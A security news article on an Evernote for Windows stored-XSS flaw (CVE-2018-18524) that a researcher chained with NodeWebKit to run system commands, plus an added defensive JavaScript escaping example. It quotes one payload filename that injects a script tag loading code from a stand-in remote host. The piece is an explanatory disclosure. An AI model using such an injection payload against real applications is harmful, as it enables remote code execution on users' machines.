Online note sharing company Evernote has patched a hole that allowed attackers to infect notes shared via its service. The vulnerability (CVE-2018-18524) could have allowed an attacker to run programs remotely on a victim’s computer simply by sharing a note with them and persuading them to view it.
Evernote has patched the vulnerability in Evernote for Windows 6.16.1 beta.
The vulnerability, discovered by TongQing Zhu, a researcher at Chinese cybersecurity company Knownsec, was a form of cross-site scripting (XSS) attack. XSS attacks allow attackers to inject malicious code into websites, and they come in two forms:
The first is the way we normally think of XSS, called reflected XSS. Reflected XSS works by poisoning links to legitimate websites with malicious, executable code. When the victim clicks the link, the vulnerable website processes the link’s information as normal, to work out which page to serve, and inadvertently runs the malicious code at the same time.
For this to work, the attacker has to fool you into clicking on a link they’ve given you, either by sending it to you in an email or adding it to another website or social media post.
The second type of XSS exploit, which is what Zhu found in Evernote, is called stored or persistent XSS. Instead of poisoning a malicious link and hoping you click it, the attacker embeds their malicious code into the website directly.
To pull this off they typically have to find a place on a website that embeds user-supplied data, such as a comment form, into which they inject their code. Anyone landing on the page after the attacker will automatically execute the code they’ve left behind.
Because many native desktop and mobile applications use browser engines to display information, XSS attacks can affect them too, and that’s what happened here.
In this case, another security researcher found an XSS flaw in an older version of Evernote that enabled attackers to launch JavaScript commands directly in the program’s stored notes.
As with all XSS attacks, the vulnerability was caused by poor data validation: input that should have been handled as data was treated as code. Because it didn’t remove or escape the characters <, > and " in the filenames of pictures embedded in notes, attackers could exploit Evernote notes by embedding code into filenames, like so:
"><script src="http://example.org/bad-javascript.js">.jpg
When the note was opened, the code would run. The example above would fetch more malicious code from a remote location.
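The following is an added example, not Evernote's code, showing why the filename above breaks out of the markup and what attribute escaping does to it. The `<img>` template is an assumption about how a note might embed a picture; the filename is the one quoted above, embedded here as a constructed input.

```javascript
// Constructed input: the attacker-controlled filename quoted in the article.
const ATTACKER_FILENAME = '"><script src="http://example.org/bad-javascript.js">.jpg';

// Escape every character that can close an attribute value or open a tag.
// '&' is replaced first so the entities produced afterwards are not re-escaped.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable rendering (assumed template): the filename is interpolated as-is,
// so the leading '">' closes the src attribute and the <img> tag, and the rest
// of the filename is parsed as a new <script> element.
function renderImgUnsafe(filename) {
  return `<img src="resources/${filename}" alt="${filename}">`;
}

// Hardened rendering: the same template, but every attribute value is escaped
// before interpolation, so the whole filename stays inside the quotes as data.
function renderImgSafe(filename) {
  const f = escapeHtmlAttr(filename);
  return `<img src="resources/${f}" alt="${f}">`;
}

// Cheap regression check for a note-rendering test suite: count how many tags
// the markup actually opens. Embedding one picture must open exactly one tag.
function countTags(html) {
  return (html.match(/<[a-zA-Z][^\s>]*/g) || []).length;
}

function demo() {
  const unsafe = renderImgUnsafe(ATTACKER_FILENAME);
  const safe = renderImgSafe(ATTACKER_FILENAME);
  console.log('unsafe:', unsafe, '-> tags opened:', countTags(unsafe));
  console.log('safe:  ', safe, '-> tags opened:', countTags(safe));
  return { unsafe, safe };
}

demo();
```

The unsafe rendering opens three tags from a single picture (the `<img>` plus a `<script>` from each interpolated copy of the filename); the escaped version opens one.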
That isn’t something Evernote would want a note to do, but Zhu took it further.
He searched around in Evernote’s installation folders and found NodeWebKit, which is an application runtime based on the Chromium open-source browser and the Node.js JavaScript framework. Evernote uses this runtime in its presentation mode.
After some trial and error with different commands, he was able to use Node.js to execute system commands and read system files. If he could get a Node.js script into a note in presentation mode, he figured he could get the NodeWebKit runtime to run it on the victim’s machine.
To deliver the script to the runtime, he exploited the validation flaw in Evernote’s notes by renaming a file and including a reference to his Node.js file.
Zhu could deliver the infected note simply enough via the Evernote work chat function, which allows different Evernote users to chat with each other electronically. He would include an instruction to view the note in presentation mode. If the user took the bait, NodeWebKit would automatically run his script.
He demonstrated this by displaying the contents of Win.ini and opening the Windows calculator when viewing an infected note in a test account.
Because of his efforts, Evernote users are a little safer today (provided they download and install the update), and Zhu has been added to the Evernote Hall of Fame.